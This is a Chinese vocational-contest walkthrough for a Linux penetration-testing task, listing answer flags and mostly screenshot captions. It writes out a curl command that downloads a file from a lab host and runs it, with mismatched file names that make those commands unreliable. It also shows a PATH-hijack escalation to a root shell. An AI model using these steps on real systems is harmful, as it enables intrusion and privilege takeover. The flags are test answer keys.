2023年中职网络安全——Web渗透测试(Server2380)

B-8:Linux操作系统渗透测试

任务环境说明:

✓ 服务器场景:Server2380(关闭链接)

✓ 服务器场景操作系统:未知

✓ 用户名:未知 密码:未知

需要环境加q

2023年中职网络安全——Web渗透测试(Server2380)_第1张图片

1. 找出Apache的版本号作为Flag值(例如:2.2.15)提交;

2023年中职网络安全——Web渗透测试(Server2380)_第2张图片

flag:2.4.38

2. 找出Samba服务器的版本号作为Flag值(例如:5.0.22)提交;

2023年中职网络安全——Web渗透测试(Server2380)_第3张图片

flag:4.3.11

3. 找出系统内核版本号作为Flag值(例如:2.6.18)提交;

2023年中职网络安全——Web渗透测试(Server2380)_第4张图片2023年中职网络安全——Web渗透测试(Server2380)_第5张图片2023年中职网络安全——Web渗透测试(Server2380)_第6张图片

2023年中职网络安全——Web渗透测试(Server2380)_第7张图片2023年中职网络安全——Web渗透测试(Server2380)_第8张图片2023年中职网络安全——Web渗透测试(Server2380)_第9张图片

分别执行这三条命令

curl http://192.168.112.38:8080/pikhudmK -O hhh
chmod +x ISCHmhD7
./ISCHmhD7

2023年中职网络安全——Web渗透测试(Server2380)_第10张图片

flag:4.4.0-142

4. 找出网站跟路径下的图片内容作为Flag值提交;

2023年中职网络安全——Web渗透测试(Server2380)_第11张图片

flag:eurvhnpmvzvbsmdwpm

5. 找出/root目录中的txt文件,将文件内容为Flag值提交;

2023年中职网络安全——Web渗透测试(Server2380)_第12张图片2023年中职网络安全——Web渗透测试(Server2380)_第13张图片

export PATH=/tmp:$PATH 把tmp目录添加到环境变量里

echo "/bin/bash -p" >/tmp/ps  在tmp目录创建ps文件写入让他反弹root

chmod 777 /tmp/ps  给权限

/home/jobs/shell   执行提权

2023年中职网络安全——Web渗透测试(Server2380)_第14张图片

flag:CGYUMUSvbuwey

你可能感兴趣的:(中职网络安全,web渗透,安全)